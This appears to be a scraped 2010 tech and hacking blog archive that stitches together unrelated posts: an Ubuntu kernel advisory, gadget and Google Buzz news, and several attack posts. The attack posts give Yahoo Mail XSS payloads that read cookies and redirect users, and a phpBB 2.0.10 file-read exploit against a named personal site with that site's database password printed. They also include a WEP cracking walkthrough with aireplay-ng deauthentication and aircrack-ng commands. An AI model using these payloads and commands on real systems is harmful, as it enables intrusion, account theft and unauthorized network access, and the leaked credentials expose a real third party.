Intipadi.com – Canonical announced a few hours ago the immediate availability of a new Linux kernel security update for the following Ubuntu distributions: 6.06 LTS (Dapper Drake), 8.04 LTS (Hardy Heron), 8.10 (Intrepid Ibex), 9.04 (Jaunty Jackalope) and 9.10 (Karmic Koala). The update also applies to Kubuntu, Edubuntu and Xubuntu and it patches 10 important security issues (see below for details) discovered in the Linux kernel packages by various hackers. Therefore, it is strongly recommended to update your system as soon as possible!
The following Linux kernel vulnerabilities were discovered:
1. The EXT4 and HFS filesystems failed to check various disk structures. Because of this, a remote attacker could trick a user into mounting a specially devised filesystem and could crash the affected system or gain root (system administrator) privileges. The issue was discovered by Amerigo Wang and Eric Sesterhenn and affects all the aforementioned Ubuntu systems.
2. FUSE (Filesystem in Userspace) failed to check various requests. Because of this, a local attacker that had access to FUSE mounts could crash the affected system or gain root (system administrator) privileges. The issue affects only Ubuntu 6.06 LTS, 8.04 LTS, 8.10 and 9.04 systems.
3. KVM failed to decode various guest instructions. This could lead to a DoS attack and crash the affected system, by triggering “high scheduling latency” in the host. The issue affects only Ubuntu 8.04 LTS, 8.10, 9.04 and 9.10 systems.
4. The OHCI firewire driver failed to handle various ioctls. Because of this, a local attacker could crash the affected system or gain root (system administrator) privileges. The issue affects only Ubuntu 8.04 LTS, 8.10, 9.04 and 9.10 systems.
5. The Linux kernel failed to handle O_ASYNC on locked files. Because of this, a local attacker could gain root (system administrator) privileges. The issue was discovered by Tavis Ormandy and affects only Ubuntu 9.04 and 9.10 systems.
6. The e1000e and e1000 network drivers for Eee PCs failed to check Ethernet frames’ size. Because of this, a local attacker on the LAN could crash the affected system or gain root (system administrator) privileges by sending specially devised traffic. The issue was discovered by Neil Horman and Eugene Teo, and affects all Ubuntu systems.
7. Random contents of kernel memory could be shown by “print-fatal-signals” reporting. This could lead to loss of privacy. The issue affects only Ubuntu 8.04 LTS, 8.10, 9.04 and 9.10 systems.
8. IPv6 failed to handle jumbo frames. This could lead to a DoS attack and crash the affected system. The issue was discovered by Olli Jarva and Tuomo Untinen, and affects only Ubuntu 9.04 and 9.10 systems.
9. The rules of bridging netfilter could be modified by regular users. This could lead to a DoS attack, by fracturing the network traffic. The issue was discovered by Florian Westphal and affects all Ubuntu systems.
10. Linux kernel memory could be leaked by various mremap operations. This could lead to a DoS attack, by consuming the entire available memory. The issue was discovered by Al Viro and affects all Ubuntu systems.
The above Linux kernel vulnerabilities can be fixed if you update your system today to the following specific packages:
• For Ubuntu 6.06 LTS, users should update their kernel packages to linux-image-2.6.15-55.82.
• For Ubuntu 8.04 LTS, users should update their kernel packages to linux-image-2.6.24-27.65.
• For Ubuntu 8.10, users should update their kernel packages to linux-image-2.6.27-17.45.
• For Ubuntu 9.04, users should update their kernel packages to linux-image-2.6.28-18.59.
• For Ubuntu 9.10, users should update their kernel packages to linux-image-2.6.31-19.56.
Don’t forget to reboot your computer after this important kernel update! To verify the kernel version, type the sudo dpkg -l linux-image-2.6.31-19-generic command in a terminal (the example is for Ubuntu 9.10 users ONLY, and it will output the version of the Linux kernel listed above).
ATTENTION: Due to an unavoidable ABI change, the kernel packages have a new version number, which will force you to reinstall or recompile all third-party kernel modules you might have installed. Moreover, if you use the linux-restricted-modules package, you have to update it as well to get modules that work with the new Linux kernel version.
Sunday, February 14, 2010
10 vulnarabilities in ubuntu kernal
Notion Ink's ADAM Vs Ipad
While the iPad is all ready to be
shipped across in the US by March end one of its strongest competitors
viz, Notion Inks’ ADAM is pulling up its socks for a showdown with with
the worlds best in innovation to be officially announced and unveiled
at the Mobile World Conference (MWC) next week.
Now you would think what makes the Adam
suh a strong competitor to the iPad. Well here it goes. The iPad has
been strongly criticised on various aspects and this is exactly where
the Adam scores. The Adam uses NVIDIA’s new Tegra 2 chipset as a
result its able to run the same hardware as the iPad effectively 2-3 x
longer. Add to it the Pi Qixel display and the longevity is further
improved. Besides the Adams’ Pi Qixel can display
a 1080p HD video whereas the iPad merely manages a 576/480p. Its
slimmer than the iPad (13.4mm) with two different versions at 12.9mm
and 11.4mm thickness. Notion Ink CEO Rohan Shravan also hints that they
can go more thin by opting for a slimmer LCD (currently which occupies
a 5mm space)
They are already garnering content
partnerships with various digital magazines, e-books and comics, the
list of which is growing as we speak. Also they are planning to
announce an Apps competition for developers with approx prize of around
$ 1m. If these weren’t enough to tilt the balance the Adam runs Flash and comes with USB ports.
Imagine all of this and perhaps a
little more (maybe they have something more up their sleeves) at a
lower price tag than the iPads’. For now the price point is mere
speculation till the MWC. Still you never know. Our money is certainly
on Notion Inks Adam to give the iPad a run for its money.
Go Adam Go!!
Friday, February 12, 2010
Yahoo! Mail Beta - XSS all the way
<script>alert("Ohno");</script>
I clicked on send and hoped Yahoo hadnt been that dumb. Opening the email I found out, they hadnt. Good for them. So I decided to move it up a step, and sent myself a html link. This is where the problem started. I wrote the word "Test" and highlighted it. I then clicked on their button to make a hyperlink. It gave me the option of choosing different types of links (ftp: etc.), but I stuck with http://. I entered in the following:
http://www.yahoo.com">Here</a><script>alert("Ohno");</script>
Clicked ok, and sent the email. Upon picking the email up, I recieved a pop-up message simple saying "Ohno". Oh no indeed. I had to check that other things were not possible using this flaw, so I tried to view my cookie using an alert box, thinking they may have put it a check for the document.cookie command:
http://www.yahoo.com" onMouseOver="alert(document.cookie)";
I sent the email, picked it up, and hovered my mouse over the link. A second later, an alert box popped up, with information that was stored in my cookie. Thinking that I could SEE my cookie, I wondered if it was possible to SEND my cookie somewhere, or even get the user to navigate to a web page. "Sure" I thought. "Just change the code using window.location and then a website and the website should pop-up!" So I tried it out:
http://www.yahoo.com">Here</a><script>window.location="www.datastronghold.com"</script>
Once picked up, I was dismayed a little to say the least. It hadnt worked. I was presented instead with a Yahoo error page, saying it was unable to find the link. Now, I know the site is there. YOU know the site is there. So why didnt Yahoo let me get onto it? They have been clever in a little way to say the least, it seems that only Yahoo sites could be displyed through the lower pane. SUrely that'll stop any fraud sites wont it? Of course not. A little simple modification, and the link works fine:
In case you don't know, the URL shown there is a link that I took from the Yahoo search engine, when it links to another page. Just by visiting a random page through yahoo and trimming off the url at the end, you can freely add your own, and the XSS script works fine! In fact, if the user tries to view any of their other emails, they cant! They are stuck with that page!
WARNING: This could lead to exploititive use, such as requeting for Yahoo user names and passwords, seeing as the url is not shown unless you view the pages properties, allowing phising sites to fake Yahoo logon pages, stating the users time on the email account has run out and they need to log in again. This, as well as allowing cookies to be sent to a php script for example:
Provides a mssive problem for BT and Yahoo. I have yet to find a suitable contact for BT and Yahoo to report this to, so here it is for your educational purposes: Do NOT use Yahoo! Mail Beta. I cannot stress that enough!
Legal note (so I dont get sued): I provide the above information as educational information and in no way encourage or support the mis-use of this information.
How do get root accses in phpbb 2.0.10 hosted by free.fr
Then, you have a victim example http://romain.matu.free.fr/phpBB2/
Now go to a topic and take the topic id.
Paste : viewtopic.php?a=config.php&t=TOPICID&highlight=%2527.readfile($HTTP_GET_VARS[a]).%2527
Results : http://romain.matu.free.fr/phpBB2/viewtopic.php?a=config.php&t=460&highlight=%2527.readfile($HTTP_GET_VARS[a]).%2527
Finally, look at the source of the page, and somewhere will appear :
<?php
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
$dbms = 'mysql';
$dbhost = 'sql.free.fr';
$dbname = 'romain.matu';
$dbuser = 'romain.matu';
$dbpasswd = 'nintendo';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
With Free.fr, the sql database login/pass are the same for the ftp account
FTP Adres: ftpperso.free.fr
Thursday, February 11, 2010
Cracking Wifi with Back|Track
First of all, you'll need to check and make sure your wireless card has the right chipset. Most wireless cards are programmed only to accept data that is addressed to them. Other cards, specifically the ones that are of use for wifi sniffing, are capable of picking up all traffic that is flying through the air. Common types are Atheros, Prism, Aironet, Realtek, Hermes, etc based cards. You are on your own figuring out what type of chipset your wireless card has, as its too vast to get into here, but check this thread for more info. Your probably just going to have to search for your specific card to find out what chipset it has then compare it to this compatability list. For a good discussion on types of cards that work, check this http://forums.remote-exploit.org/showthread.php?t=2191
Next, download a copy of back|track, a slackware distro designed for security testing purposes. This is a linux livecd, which means it will boot the entire OS from the cd. Download the ISO and use a burning program such as Nero, Alcohol or my personal favorite, the awesome freeware cd/dvd burning program cdburnerXP to burn the disk image to a cd. Pop the disk in and reboot, and boot from the disk. Back|track may take a while to boot up.
When back|track boots up (and hopefully finds all your hardware) you will be presented with a login screen. To quote the venerable xatar, "Read the f**king screen!" The login, as it says above the prompt is "root" and the password is "toor" (minus the ""). Note that linux is case sensitive. After you are logged in, you could run all of the commands I will get into later from this prompt. But thats no fun, so type in:
xconf
This should create a file /etc/X11/xorg.conf and autodetect your video settings. (with nvidia cards, you may still have video problems as I did, such as not getting above 640x480... should you choose to install backtrack to the harddrive, check out http://forums.remote-exploit.org/showthread.php?t=2176&highlight=nvidia for more info on fixing this)
To get the KDE gui desktop to start up, simply type:
startx
If everything goes smoothly, you should be awash in the beautiful glow of the back|track KDE desktop. Given the beautiful read only nature of the livecd, you can do anything to this operating system and not have to worry about messing it up. If things get a little weird, or screwed up, just reboot and the OS is back to normal. So GO EXPLORE, run random programs, see what they do, go nuts.
At the bottom left of the screen is a little icon that looks like a monitor with a black screen. This is called the bash prompt. This is where you will be spending most of your time, so click on this to open up a new bash prompt. Note that you can double click on the bar to the right of the tab that says "Shell" and it will create a new bash tab, negating the necessity to open up multiple instances of the bash window. First, a few networking commands to get you up to speed on your own system. Type
ifconfig -a
This will show you a list of all compatible network cards on your system. You should see a list of devices such as ath0, eth0, wifi0, wlan0 etc. One of these is your wireless card. If you have an Atheros based card, it will be ath0. Make note of the name of your card, as you will be using it later. For the rest of this guide, I will be using ath0 since that is the card I have. Replace ath0 with whatever card you have.
You can also check out your wireless cards specifically by typing in:
iwconfig
I've got two wireless cards. The one built into my laptop, an intel card (eth0) and an Atheros pcmcia card (ath0). Now that we have the name of our wireless cards, we can start sniffing. Some like to use Kismet to sniff for networks, but I find using airodump-ng to be easier and ultimately more effective. In your bash prompt, type:
airodump-ng --write out --ivs --abg ath0
This starts airodump-ng and tells it to begin sniffing data, write it to the file out, only capture IVs (Initialization Vectors), search the a, b and g bands using the ath0 card. Keep in mind, every time you specify the same output file name, such as "out", airodump-ng will append the file name with "-##" such as out-01.ivs, out-02.ivs, etc.You will see a list of access points on the top half of the screen, and clients on the bottom. Find your access point in the list. Write down the BSSID or Mac address of the access point and any connected clients. You'll need it later. From now on in this document, the access point's mac address will be referred to as APmac and the client mac as CLmac. The goal of the attack is to capture as many unique IVS as possible. Every time data is sent between the wireless server and client, each packet contains IV which are collected and then run through the aircrack-ng program for computation.
You should be seeing a ton of numbers flying by, but not updating vary quickly. Thats because airodump-ng is searching all channels. Once you see your network, note what channel it is on (under the CH header). Stop airodump-ng by hitting:
ctrl-c
Now start it up again but this time we will add --channel # where # is the channel number of the access point, say, channel 6
airodump-ng --channel 6 --write out --ivs --abg ath0
Airodump-ng should be running much faster now, and updating constantly. You will see a number rising very quickly, this is generally the beacons. Beacons just basically say "hey, i'm an access point" about 10 times a second. You can judge the quality of your connection by how fluid the rise in beacons are. Other than this, they are useless for our purposes. For this type of attack it is important for there to be a client connected to the access point. So march over to your other computer and log on to the net wirelessly. In backtrack, you should see at the bottom a client pop up, the first MAC is the access point and the 2nd is the Client. Write down both. Open a new bash prompt and type:
aireplay-ng -2 -b APmac -d ff:ff:ff:ff:ff:ff -m 68 -n 68 -p 0841 -h CLmac ath0
Where APmac is the mac address (bssid) of the access point and CLmac is the mac address of the client. For a detailed explanation of what all these settings do, open up a new bash prompt and just type aireplay-ng and it will spew out all the controls and what they do. The only one not explained is that the very first -2 tells aireplay to do the 3rd attack method in the list at the bottom (the first being 0).
aireplay-ng will now start sniffing for a certain type of packet with a length no more and no less than 68 bytes between client and access point. It will say "Read ### packets". At this point, if there is significant data transfer between the client and ap, it may snag the right type of packet already and there is no need to do the next step. In this case, hit Y to use the packet and skip the next step. If however, it keeps reading packets for a while (more than a couple min) and does not pop up saying "Use this packet?" then do the following:
Open a new bash prompt and type:
aireplay-ng -0 1 -a APmac -c CLmac ath0
This command will effectively terminate the connection between the AP and the client forcing the client to re-connect. It is this re-connection packet that we are looking to scoop up with the first instance of aireplay.
Go back to the first instance of aireplay and you should see something at the bottom of the screen saying "Use this packet?" Hit Y and aireplay will start sending out tons of packets to the AP. Switch over to airodump-ng which should still be running in the first bash prompt. Look at the data rate of the targeted AP. If all is going well, Aireplay is spewing out packets like mad to the access point and airodump-ng is picking up the chatter in between, the data should be rising quickly. This is exactly what we want.
If for some reason the data isn't going up quickly, go back to the first aireplay-ng and hit:
ctrl-c
If aireplay had picked up any more packets, it will prompt you again if you want to use them. Try more packets. Also, you may need to get closer to your access point or try the aireplay-ng -0 method again. Experiment. Once you've got the data rate going up quickly, start aircrack-ng and start crunching the numbers. Type in
dir
To get a list of the files. One file should be the out file that you specified in airodump-ng, specifically out-01.ivs. Each time airodump-ng is started with the same file output name, it creates a new one tacking on -01, -02, etc. Make sure you know which one you are outputting to.
Type in:
aircrack-ng -f 2 -a 1 -b APmac -n 64 out-01.ivs
Wednesday, February 10, 2010
Milw0Rm Hacking Papers And Videos - Rapidshare Links!
...greetz to str0ke....!!!!!!!!!!
http://rapidshare.co...s_by_01hero.rar
http://rapidshare.co...1_by_01hero.rar
http://rapidshare.co...1_by_01hero.rar
http://rapidshare.co...9_by_01hero.rar
http://rapidshare.co...00by_01hero.rar
http://rapidshare.co...4_by_01hero.rar
http://rapidshare.co...6982/01hero.nfo
GOOGLE BUZZZZZZZZZZZZ
t’s official: GoogleGoogle
On stage revealing the new product was Bradley Horowitz, Google’s vice president for product management. While introducing the product, Mr. Horowitz focused on the human penchant for sharing experiences and the social media phenomenon of wanting to share it in real time. These two key themes were core philosophies behind Google Buzz.
“It’s becoming harder and harder to find signal in the noise,” Bradley stated before introducing the product manager for Google Buzz, Todd Jackson.
Here are the details:
Google Buzz: The Details
- Mr. Jackson introduced “a new way to communicate within GmailGmail
- Key feature #1: Auto-following
- Key feature #2: Rich, fast sharing experience
- Key feature #3: Public and private sharing
- Key feature #4: Inbox integration
- Key feature #5: Just the good stuff
- Google then began the demo. Once you log into Gmail, you’ll be greeted wiht a splash page introducing Google Buzz.
- There is a tab right under the inbox, labeled “Buzz”
- It provides links to websites, content from around the web. PicasaPicasa
- It shows thumbnails when linked to photos from sites like Picasa and Flickr. Clicking on an image will blow up the images to almost the entire browser, making them easier to see.
- It uses the same keyboard shortcuts as Gmail. This makes sense. Hitting “R” allows you to comment/reply to a buzz post, for example.
- There are public and private settings for different posts. You can post updates to specific contact groups. This is a lot like FacebookFacebook
- Google wants to make sure you don’t miss comments, so it has a system to send you an e-mail letting you know about updates. However, the e-mail will actually show you the Buzz you’ve created and all of the comments and images associated with it.
- Comments update in real time.
- @replies are supported, just like Twitter. If you @reply someone, it will send a buzz toward an individual’s inbox.
- Google Buzz has a “recommended” feature that will show buzzes from people you don’t follow if your friends are sharing or commenting on that person’s buzz. You can remove it or change this in settings.
- Google is now speaking about using algorithms to help filter conversations, as well as mobile devices related to Buzz.
The Mobile Aspect
- Google buzz will be accessible via mobile in three ways: from Google Mobile’s website, from Buzz.Google.com (iPhone and AndroidAndroid
- Buzz knows wher you are. It will figure out what building you are and ask you if it’s right.
- Buzz has voice recognition and posts it right onto your buzz in real-time. It also geotags your buzz posts.
- Place pages integrate Buzz.
- In the mobile interface, you can click “nearby” and see what people are saying nearby. NIFTY, if I say so myself.
- You can layer Google MapsGoogle Maps
- Conversation bubbles will appear on your Google Maps. They are geotagged buzz posts, which lets you see what people are saying nearby.
